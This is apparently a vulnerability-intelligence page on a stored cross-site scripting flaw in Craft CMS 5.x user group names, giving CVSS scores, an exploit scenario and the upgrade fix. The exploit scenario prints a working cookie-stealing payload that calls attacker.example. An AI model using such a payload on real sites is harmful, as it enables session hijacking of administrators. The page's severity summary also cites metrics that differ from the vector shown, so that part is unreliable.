Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Admin credentials required (PR:H); victim must visit permissions page (UI:R); payload executes cross-user causing scope change (S:C); no availability impact.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
Craft CMS from version 5.0.0-RC1 contains a stored cross-site scripting vulnerability in the User Permissions page where user group names are rendered without proper HTML escaping. Attackers with admin access can inject arbitrary JavaScript via the user group name field that executes when other users view or edit permissions.
AnalysisAI
Stored XSS in Craft CMS (versions 5.0.0-RC1 through 5.8.21) allows an admin-level attacker to permanently embed malicious JavaScript into the User Permissions page by crafting a user group name with an unsanitized HTML payload. The script executes in the browser of any user who subsequently opens the Permissions tab on a user's edit page, creating a persistent cross-user attack vector within the control panel. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires: (1) the attacker holds admin-level access to the Craft CMS control panel - PR:H per CVSS; (2) the Craft CMS instance has allowAdminChanges enabled in its production configuration - this is a non-default posture explicitly warned against in Craft's security documentation; (3) a second user must actively navigate to the Permissions tab of a user edit page (/admin/users/{id}) after the malicious group name is saved - UI:A per CVSS 4.0. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 4.6 (Medium) reflects the high privilege requirement (PR:H - admin access) and required user interaction (UI:A), which significantly limit the realistic attack surface compared to a typical stored XSS. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with admin credentials on a Craft CMS 5.x installation that has allowAdminChanges enabled navigates to Settings → Users → User Groups, creates or renames a group with the payload '<img src=x onerror="fetch('https://attacker.example/steal?c='+document.cookie)" hidden>', and saves it. When a second admin or privileged user later opens any user's edit page and clicks the Permissions tab, the injected script silently exfiltrates the victim's session cookie to the attacker's server. … |
| Remediation | Upgrade Craft CMS to version 5.8.22 or later, which applies output escaping to user group names in the User Permissions page template per the upstream fix referenced in https://github.com/craftcms/cms-ghsa-4mgv-366x-qxvx/pull/2. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Cayin CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. Rated c
Multiple integer underflows in the icmLut_allocate function in International Color Consortium (ICC) Format library (iccl
phpKF CMS 3.00 Beta allows unauthenticated PHP file upload by disguising it as a PNG, then renaming it for execution. Po
Deserialization of Untrusted Data in the Sitecore.Security.AntiCSRF (aka anti CSRF) module in Sitecore CMS 7.0 to 7.2 an
Deserialization of Untrusted Data in the anti CSRF module in Sitecore through 9.1 allows an authenticated attacker to ex
SQL injection vulnerability in hava_post.php in Havalite CMS 1.1.0 and earlier allows remote attackers to execute arbitr
Unrestricted file upload vulnerability in hava_upload.php in Havalite CMS 1.1.0 and earlier allows remote attackers to e
Cross-site request forgery (CSRF) vulnerability in Ilch CMS allows remote attackers to hijack the authentication of admi
Multiple cross-site scripting (XSS) vulnerabilities in Havalite 1.0.4 and earlier allow remote attackers to inject arbit
A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.
A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.
A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38175
GHSA-9r7j-7jhg-4f4c